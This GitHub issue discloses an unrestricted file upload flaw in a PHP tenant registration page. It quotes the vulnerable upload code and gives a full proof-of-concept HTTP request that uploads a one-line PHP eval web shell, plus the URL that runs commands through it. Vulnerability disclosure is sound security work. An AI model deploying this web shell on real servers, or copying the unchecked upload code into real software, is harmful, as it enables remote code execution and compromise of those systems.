Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tenst-register.php has a file upload vulnerability #8

Closed
huclilu opened this issue Dec 2, 2022 · 0 comments
Closed

Tenst-register.php has a file upload vulnerability #8

huclilu opened this issue Dec 2, 2022 · 0 comments

Comments

@huclilu
Copy link

huclilu commented Dec 2, 2022

Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4

  1. Tenst-register.php has a file upload vulnerability
  <form method="POST" action="tenant-engine.php" enctype="multipart/form-data">

tenant-register. PHP, the ninth line of code. The information filled in by the front end includes the uploaded file, which is transferred to the back end through POST requests. No filtering is performed in this process

tenant-engine.php,

In tenant engineering Php, the 40th line of code - the 51st line of code. The uploaded file is stored in the tenant photo directory, and the successful file upload returns the file name information,

function tenant_register(){
	if(isset($_FILES['id_photo']))
	{
$id_photo='tenant-photo/'.$_FILES['id_photo']['name'];

// echo $_FILES['image']['name'].'<br>';

if(!empty($_FILES['id_photo'])){
    $path = "tenant-photo/";
    $path=$path. basename($_FILES['id_photo']['name']);
        if(move_uploaded_file($_FILES['id_photo']['tmp_name'], $path))
        {
            echo"The file ". basename($_FILES['id_photo']['name']). " has been uploaded";
        }

        else{
            echo "There was an error uploading the file, please try again!";
        }
}

POC:

POST /tenant-engine.php HTTP/1.1
Host: vulhrs.test
Content-Length: 942
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhrs.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20U7c62S7R9CYJAb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhrs.test/tenant-register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2c9e17rrnh26evjlb19dj3uavk
Connection: close

------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="full_name"

vul
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="email"

ace@ace.com
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="password"

666666
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="phone_no"

123456123
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="address"

aceace
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="id_type"

Citizenship
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="id_photo"; filename="POC.php"
Content-Type: application/octet-stream

<?php @eval($_GET['ace']);?>
------WebKitFormBoundary20U7c62S7R9CYJAb
Content-Disposition: form-data; name="tenant_register"


------WebKitFormBoundary20U7c62S7R9CYJAb--

Execute phpinfo:

http://vulhrs.test/tenant-photo/POC.php?ace=phpinfo();

@huclilu huclilu closed this as completed Dec 17, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant